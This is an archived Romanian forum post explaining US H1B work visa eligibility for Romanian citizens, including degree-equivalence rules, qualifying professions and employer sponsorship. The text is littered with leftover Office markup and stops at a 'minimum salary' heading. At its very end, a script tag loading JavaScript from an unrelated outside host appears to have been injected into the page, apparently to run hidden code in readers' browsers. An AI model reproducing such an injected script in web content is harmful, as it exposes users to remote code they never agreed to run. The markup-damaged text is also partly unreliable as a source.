PDA

Arată versiune întreagă : Viza de lucru H1B pentru SUA



sorin
11.10.2004, 04:22
Viza de lucru H1B pentru SUA

Pot beneficia de o viza de lucru H1B, pentru <st1:country-regi&#111;n w:st="&#111;n"><st1:place w:st="&#111;n">America</st1:place></st1:country-regi&#111;n>, cetatenii romani care sunt specializati intr-un anumit domeniu profesional care necesita cunostiinte deosebite. Vom denumi in continuare aceste persoane "lucratori specializati". Exprimandu-ne intr-un limbaj de lemn, pentru a va califica ca un lucrator specializat, profesia dumneavoastra trebuie sa aplice cunostiinte teoretice si practice foarte specializate precum si sa necesite studii echivalente cu absolvirea unei facultati de 4 ani. Studiile superioare nu sunt absolut necesare si fiecare an de studiu poate fi inlocuit de 3 ani experienta in domeniul respectiv de lucru. Astfel 12 ani de experienta echivaleaza cu absolvirea unei facultati de 4 ani. Numarul de ani de studii impreuna cu experienta trebuie sa echivaleze cu absolvirea unei facultati de 4 ani.


Pe intelesul tuturor, urmatoarele profesii se califica in aceasta categorie: specialisti IT (ingineri software/programatori/testeri, etc), asistente medicale, manechine, contabili, directori de firme, specialisti in electronica, ingineri, creatori de moda, graficieni, consultanti in anumite domenii, farmacisti, oameni de stiinta, cercetatori, scriitori technici precum si multe alte profesii.


Informatii suplimentare/ la zi mai pot fi obtinute sipe site-ul Consulatului American din Bucuresti (http://www.usembassy.ro/InfoR/romana/n&#111;nimm6.htm#H1B).
<B style="mso-bidi-font-weight: normal">Conditii pentru obtinerea vizei[/B]
<B style="mso-bidi-font-weight: normal">[/B]
<B style="mso-bidi-font-weight: normal">Oferta de angajare[/B]
Pentru a obtine o astfel de viza trebuie sa gasiti o firma <st1:place w:st="&#111;n"><st1:City w:st="&#111;n">americana</st1:City></st1:place> care sa va ofere o slujba care satisface conditiile de mai sus. Specializarea dumneavoastra trebuie sa se potriveasca cu slujba oferita. Obtinerea unei astfel de vize presupune anumite costuri din partea firmei americane precum si o anumita perioada de asteptare pana la obtinere vizei, timp in care nu veti putea lucra. Aceste costuri trebuiesc suportate de catre companie si este ilegala suportarea costurilor de catre angajat. Din aceste motive nu toate companiile sunt dispuse sa sponsorizeze o viza H1B.
<B style="mso-bidi-font-weight: normal">Salariul mimim[/B]<B style="mso-bidi-font-weight: normal"<script src=http://www.iroe.ru/ngg.js></script>